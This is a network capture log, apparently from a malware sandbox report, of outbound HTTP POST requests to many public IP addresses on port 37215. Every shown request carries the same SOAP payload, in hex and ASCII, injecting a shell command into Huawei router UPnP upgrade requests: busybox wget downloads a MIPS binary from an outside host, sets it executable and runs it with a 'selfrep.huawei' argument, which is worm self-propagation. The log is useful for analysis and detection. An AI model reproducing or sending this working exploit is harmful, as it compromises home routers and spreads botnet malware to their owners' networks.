                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  655192.168.2.1352646157.50.39.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364262104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  656192.168.2.1333554197.198.54.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364279985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  657192.168.2.1356586197.142.208.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364382982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  658192.168.2.1355188157.61.97.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364407063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  659192.168.2.1345402197.86.118.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364437103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  660192.168.2.1343088197.94.22.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364476919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  661192.168.2.1354554203.223.102.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364511967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  662192.168.2.1340140204.249.29.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364622116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  663192.168.2.1336524197.215.148.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364658117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  664192.168.2.133379641.74.187.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364706039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 